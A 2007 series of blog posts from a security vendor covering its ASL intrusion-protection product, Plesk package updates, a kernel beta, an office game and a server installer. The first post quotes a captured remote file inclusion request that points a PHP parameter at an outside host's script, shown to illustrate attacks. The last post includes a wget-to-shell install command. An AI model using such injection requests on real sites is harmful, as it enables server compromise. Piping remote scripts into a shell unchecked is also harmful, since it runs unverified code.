Written by scott
Monday, 15 October 2007
Every day I go through the alert data collected in the ASL GUI to look for new patterns of abuse, ways to improve the engine, or other assorted tinkering-like activities. A lot of my day is spent like that, just collecting all sorts of random data that sometimes adds up to something useful. Most of the time it ends up with a lot of useless one-liners from TV or movies. Anyway... back to my point. What does a web attack look like? The following is a real attack captured from one of our servers:
GET /index.php?display=http://amyru.h18.ru/images/cs.txt? HTTP/1.1
Host: www.domain.com
User-Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)
Written by scott
Monday, 15 October 2007
2 minor Beta 2 updates have been released; all updates are available in the [asl-2.0] channel:
[*] php-ioncube-loader 3.1-2 updates Ioncube(tm) to version 3.1. Update replaces php5-ioncube-loader distributed with Plesk Server Administrator. This package has been co-released in the [atomic] channel.
[-] perl-Unix-Syslog 0.100-10 fixes issues with detection on x86_64 platforms, and corrects a related bug in psmon.
Legend:
[*] New feature
[-] Bug fix
Last Updated ( Monday, 15 October 2007 )
Written by scott
Saturday, 13 October 2007
Archive at www.atomicorp.com/channels/plesk has been updated to 8.2.1. Next on the list will be to update the atomic installer to prompt for configuration of the Plesk channel, in addition to the other fun stuff it does (like convert to CentOS).
What's New in 8.2.1
[*] Security improvements and bugfixes
[*] Upgrade procedure improvements
[-] Several autoinstaller utility bugs with packages checking and mirroring have been resolved.
[-] Several SELinux configuration issues have been resolved.
[-] Several Backup and Migration bugs have been fixed.
[-] Issue with mail stuck in qmail-queue is resolved.
[-] Issue with sending notifications about domain expiration by statistics utility is resolved.
[-] Issue with permanent Spamassassin restarting by Watchdog is resolved.
[-] Problem with incorrect message ("Management of parent node is forbidden") after domain deletion is resolved.
[-] Issue with mailing lists with dot symbols is resolved.
[-] Issue with php safe mode management by client is resolved.
[-] Issue with incorrect php dependencies of 'coppermine' and 'gallary' packages is resolved.
[-] Several issues with MySQL packages from mysql.com compatibility have been resolved.
[-] Issue with mysqldump.sh utility is resolved.
Last Updated ( Saturday, 13 October 2007 )
Written by scott
Wednesday, 10 October 2007
In an effort to make the site a little more sticky, I've decided to start a post-daily policy. Given that it's Friday I figured I'd leave everyone with a game we play here at the Pro-G (Prometheus Group).
As much as I would like to take credit for the Bear or Monkey game, Mike came up with it. Here's how it works: before you change to the XM radio Liquid Metal channel (42), you call out “Bear” or “Monkey”. If the band sounds like a Bear* you get 1 point. If they sound like a Monkey** you get 2 points (this is because XM42 tends to gravitate toward more Bear-like behavior). If you get it wrong, then you lose those points. Exception: If you call Monkey, and it's Bear... but there is at any point in the song a bit of Monkey, then you only lose 1 point. Oh... and 2 points for Girl Bear***. Got it?
*Burzum, Lamb of God: these are bear.
**Judas Priest, Dragonforce: monkey.
*** I have no examples of a girl bear band. I'm told they exist.
Last Updated ( Wednesday, 10 October 2007 )
Written by scott
Tuesday, 09 October 2007
Issues with memory management and BIOS detection have been resolved, so now we have our first cut of a 2.6.22.9 kernel. It still needs further hardware testing since we've run into issues with 2.6.22.x kernels in general with our hardware here. I'm not sure whether I'll approve this in the ASL beta 3 roll up or not. I'll probably field this in asl-2.0-bleeding first. I also had a few users push hard on an OSSEC update to fix the timestamp issues, which have been fixed in CVS. Likely this too will go into -bleeding for a bit so we can keep an eye on it.
I'll be honest, I never expected to have this kind of mixed user base with ASL. Generally security products go toward a more conservative, risk-averse crowd. I'd say that's still the vast majority out there, but in this case I have people that are more than willing/demanding to field alpha quality file system code on production web sites. Kudos to you all. You know who you are, and I think the Time Shifting stuff is amazing too.
Other changes coming up in B3 include better control of email alerts, lots and lots of bug fixes, and some new modules around process monitoring and DoS protection. If you have ideas, requests, or comments on what we've put together so far, please let us know.
Last Updated ( Thursday, 11 October 2007 )
Written by scott
Tuesday, 09 October 2007
Major changes in this update include re-imaging the system with CentOS 5, and fixes for issues with newer 1and1 kernels that do not support the vfat file system (*shaking head ruefully*). Documentation has been updated on the projects page, and the location for the script has moved from the old 3es.atomicrocketturtle.com server to www.atomicorp.com.
There are still some outstanding issues I've run into with CentOS 5 on some 1and1 hardware. Occasionally the network card will not start up correctly. There's no fix I can put in place for this without updating the CentOS 5 ISO itself.
Running the installer now uses the atomic/asl/key shortcut model:
wget -q -O - http://www.atomicorp.com/installers/aooi |sh
Changelog
- Updated installer to use CentOS 5
- Added better detection for x86_64 and i386 ISO images
- If the kernel does not use vfat, the temporary partition will use ext3, labeled as vfat
- Fixed issues with partitioning mirrored disks on /, the mirror should now be created correctly
Thanks go out to Damien at 1and1.fr for his assistance in updating and testing the installer.
Last Updated ( Tuesday, 09 October 2007 )